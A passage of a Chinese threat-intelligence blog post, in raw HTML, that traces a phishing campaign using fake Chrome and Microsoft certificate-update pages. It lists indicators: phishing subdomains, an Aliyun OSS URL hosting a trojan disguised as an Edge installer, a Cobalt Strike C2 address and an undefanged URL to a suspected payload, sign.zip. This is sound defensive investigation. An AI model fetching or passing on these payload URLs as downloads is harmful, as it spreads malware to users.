rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">a、b、c、d.xn--y7aa[.]cc</span></code><span leaf=""> 这些子域名（泛解析）都是拉取用来展示给受害者的钓鱼模板用的。</span></p><p><img data-imgfileid="100001376" class="rich_pages wxw-img" data-ratio="0.35076045627376423" data-s="300,640" data-type="png" data-w="2104" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=e221ccaa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8hfVhztkfQ4F7YicYkYE0f66fnQKxeaQn01rSnYVPAy6aaufO6RH6Rxg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">除了chrome的钓鱼页面，还发现了一款模仿微软更新根证书的页面，</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">a、b、c、d.xn--y7aa[.]cc</span></code><span leaf=""> 子域名都可以访问到。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">页面模板：</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://c.xn--y7aa[.]cc/microsoft/update.html" target="_blank">https://c.xn--y7aa[.]cc/microsoft/update.html</a></span></code></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">oss托管的木马地址为：</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="https://applow.oss-cn-hongkong.aliyuncs[.]com/MicrosoftEdgeSetup.zip" target="_blank">https://applow.oss-cn-hongkong.aliyuncs[.]com/MicrosoftEdgeSetup.zip</a></span></code></p><p><img data-imgfileid="100001378" class="rich_pages wxw-img" data-ratio="0.8001525553012967" data-s="300,640" data-type="png" data-w="2622" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=2b65df4e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh82fVKO5DfUA9ETNZ3laiaIsCV4fmTXIMammMIT8RHUYwnlrzSRPghIYg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">可见的域名全部都是套了 cloudflare 的，当然 onexss 这个项目本身也是建议在 cloudflare 上运行。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是在fofa搜索的时候发现了一个比较有趣的信息，在 154.201.80.171:8443 （IP实际是香港的）上配置的cobaltstrike曾经在 2024-11-01 被扫描到过，其中c2配置解析的C2 server是 &#34;C2Server : o.xn--y7aa.cc,/ak.js&#34;。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这属于比较典型的 &#34;web 服务挂 CDN，但是证书配置不规范导致被测绘到&#34; 真实IP没藏住的案例。</span></p><p><img data-imgfileid="100001377" class="rich_pages wxw-img" data-ratio="0.4586872586872587" data-s="300,640" data-type="png" data-w="2590" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=4fe4cb0d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8trQ9kSFFJ0KuJnGnpibMfUKn4ibHkh4FhaYJ9kfHXA0oamfwx5NtcLzA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">不过8443端口对应的web服务已经不开放。</span></p><p><img data-imgfileid="100001379" class="rich_pages wxw-img" data-ratio="0.4693053311793215" data-s="300,640" data-type="png" data-w="2476" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=cdba5d8f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8Y9AqKjQ2ZstKgDBqlAVCezocrx7XxPMqSOEjibxT8JfWmHCCDX1p6Lg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">甚至端口都不开了。</span></p><p><img data-imgfileid="100001380" class="rich_pages wxw-img" data-ratio="0.32653061224489793" data-s="300,640" data-type="png" data-w="1764" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=a4962178&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8kTfnahZ6DLWcURWRLVmbo1ia87I7d628BFW9WctXdOrxpwX9LYibgvIA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这一小节结束，攻击者的画像新增元素：菠菜猎人（现役）、喜欢用Onexss、可能玩过CobaltStrike、喜欢用阿里云OSS托管木马、拥有疑似未公开的 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">chrome、微软</span></code><span leaf=""> 钓鱼模板。</span></p><p><img data-imgfileid="100001381" class="rich_pages wxw-img" data-ratio="0.5251798561151079" data-s="300,640" data-type="png" data-w="1390" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=f283444b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8oPiaTFwWbLOOEeyq4S5IyoK4EhibDZNDw0S8iaXJHib22ojxic8CpIoxFOw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><h4 data-tool="mdnice编辑器" style="margin-top: 30px;margin-bottom: 15px;margin-left: 0px;margin-right: 0px;padding-top: 0px;padding-bottom: 0px;padding-left: 0px;padding-right: 0px;display: block;"><span style="display: none;"></span><span style="font-size: 18px;color: rgb(0, 0, 0);line-height: 1.5em;letter-spacing: 0em;text-align: left;font-weight: bold;display: block;"><span leaf="">钓鱼模板的深入溯源</span></span><span style="display: none;"></span></h4><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">由于这款 chrome 证书更新和微软的钓鱼模板都没有在市面上出现过，github 搜索关键字也没有搜到，所以把时间线拉长搜索 body 和 title 的关键字，有部分新发现。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">2023年9月，域名 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">freessl.freevar[.]com</span></code><span leaf="">，钓鱼链接指向 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf=""><a href="http://38.6.184.125/error/sign.zip" target="_blank">http://38.6.184.125/error/sign.zip</a></span></code><span leaf=""> 。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">这个结果被收录的非常少，不确定是因为开放时间比较短还是有其他原因。</span></p><p><img data-imgfileid="100001382" class="rich_pages wxw-img" data-ratio="0.22791023842917252" data-s="300,640" data-type="png" data-w="2852" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=4e8bdb6a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8CG1ZKmltLic4YTLhYJibffDJwdyibmMv3u0MfesGf2dz26u8t6ibKcyd6w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">38.6.184.125 这个IP目前除了 ssh 还开放了一个灯塔 web，有理由怀疑背后的运营者是网络安全相关人员。</span></p><p><img data-imgfileid="100001383" class="rich_pages wxw-img" data-ratio="0.5690021231422505" data-s="300,640" data-type="png" data-w="1884" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=45ee06db&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8YCrfoibVXcO5kM5xicvVY3PKVg0eBTFicNGKSrqVZ9Qro4MESXx3fwvvA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">并且 VT 上这个 IP 关联大量的疑似测试用途的样本，样本活跃时间从23年6月到24年6月，其中很可能就有钓鱼页面中的 sign.zip。</span></p><p><img data-imgfileid="100001386" class="rich_pages wxw-img" data-ratio="0.7490257209664848" data-s="300,640" data-type="png" data-w="2566" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=951353c2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh86YR5icZv4icDtx4qVOlsXuW1iblxljwkYo1oP4YTiaUIox0eAx8a1sDVUg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">样本几乎都是向 IP 发起 http 请求，看uri疑似测试用途。</span></p><p><img data-imgfileid="100001384" class="rich_pages wxw-img" data-ratio="0.34424603174603174" data-s="300,640" data-type="png" data-w="2016" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=418b5dd5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8cuUGU1RKqBu9UK4EAnicHxF439rLMeMW56vjQ4ETeWy771nJBUsqXXA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001385" class="rich_pages wxw-img" data-ratio="0.28660714285714284" data-s="300,640" data-type="png" data-w="2240" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=a34ac367&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8FoM3AlDHS1bh70pq31Olozpx6n4Px4nDQuVyIqNCb5bUGRFv5bNCTQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001387" class="rich_pages wxw-img" data-ratio="0.3819628647214854" data-s="300,640" data-type="png" data-w="2262" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=bd3bc6db&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8R9WurIagSYPmnt4t5WfwicoiaOoPYeZoB7X42Rk64CSNHpC0PfkQnnzQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img data-imgfileid="100001388" class="rich_pages wxw-img" data-ratio="0.30118289353958144" data-s="300,640" data-type="png" data-w="2198" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=ef353836&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh81zHDTjzCdHgsbPkic7L4Nk75j0ia7s1tHcwUNcBMJeWdy6Fo8unydlow%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">其中有个样本似乎还是 Supershell 的🐎，就很国产红队。</span></p><p><img data-imgfileid="100001389" class="rich_pages wxw-img" data-ratio="0.22882096069868996" data-s="300,640" data-type="png" data-w="2290" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=1e866cf2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh802vt6VhgxAQPm0sGMngcSWE5HXJyaFjA2WFvg1EibokmXTFzXMD5xvA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">但是除此之外没有其他证据表明 38.6.184.125 跟 CSDN 事件的样本、网络资源有关联，除非有手段能反推回去或者直接定位到相关人，不然该 IP 只能作为一个疑似相关人的嫌疑IP。</span></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">除 38.6.184.125 之外hunter上还能找到三个有嫌疑的IP。</span></p><p><img data-imgfileid="100001390" class="rich_pages wxw-img" data-ratio="0.2512019230769231" data-s="300,640" data-type="png" data-w="3328" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=3d488493&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8oUXpjLpobfRQvRoM9rqaQ18czoVCrbsQU7jfxGxUI4LWNwG2LegENA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">其中  180.76.161.95 是 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">chromium.hk.cn</span></code><span leaf=""> 的解析IP，</span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">chromium.hk.cn</span></code><span leaf=""> 的页面似乎保存自chrome的报错页面。</span></p><p><img data-imgfileid="100001391" class="rich_pages wxw-img" data-ratio="0.4859467455621302" data-s="300,640" data-type="png" data-w="2704" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=a372b27e&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8h1wVdAdlElYIJb7AcV4rHa33ZjNtNwIzqibj1PM8KMzvjgf35gbkNyw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">chromium.hk.cn</span></code><span leaf=""> 也挂过 cloudflare。</span></p><p><img data-imgfileid="100001392" class="rich_pages wxw-img" data-ratio="0.2703023117960877" data-s="300,640" data-type="png" data-w="3374" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=c57f61fc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8qFW7zBkiaMpX2XBy9ytXchBuM108iaK8prX8rRlORp4DRJuCcAE0JPqg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 0px;margin-bottom: 0px;margin-left: 0px;margin-right: 0px;padding-top: 8px;padding-bottom: 8px;padding-left: 0px;padding-right: 0px;"><span leaf="">通过搜到的域名看，被挂 </span><code style="color: rgb(30, 107, 184);font-size: 14px;line-height: 1.8em;letter-spacing: 0em;background-attachment: scroll;background-clip: border-box;background-color: rgba(27, 31, 35, 0.05);background-image: none;background-origin: padding-box;background-position-x: left;background-position-y: top;background-repeat: no-repeat;background-size: auto;width: auto;height: auto;margin-top: 0px;margin-bottom: 0px;margin-left: 2px;margin-right: 2px;padding-top: 2px;padding-bottom: 2px;padding-left: 4px;padding-right: 4px;border-top-style: none;border-bottom-style: none;border-left-style: none;border-right-style: none;border-top-width: 3px;border-bottom-width: 3px;border-left-width: 3px;border-right-width: 3px;border-top-color: rgb(0, 0, 0);border-bottom-color: rgba(0, 0, 0, 0.4);border-left-color: rgba(0, 0, 0, 0.4);border-right-color: rgba(0, 0, 0, 0.4);border-top-left-radius: 4px;border-top-right-radius: 4px;border-bottom-right-radius: 4px;border-bottom-left-radius: 4px;overflow-wrap: break-word;font-family: Consolas, Monaco, Menlo, monospace;word-break: break-all;"><span leaf="">chromium.hk.cn</span></code><span leaf=""> 似乎不是bc相关的资源。</span></p><p><img data-imgfileid="100001393" class="rich_pages wxw-img" data-ratio="0.36493738819320215" data-s="300,640" data-type="png" data-w="3354" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=531003e8&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F4iacC3bS3Zh1gzllThVLPpP9SX7k6UMh8kcZ9SicCBV8FaSUNoibGE8cMFjsSDyKavCouwpFice2q4UyUghtNke7QQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p data-tool="mdnice编辑器" style="color: rgb(0, 0, 0);font-size: 16px;line-height: 1.8em;letter-spacing: 0em;text-align: left;text-indent: 0em;margin-top: 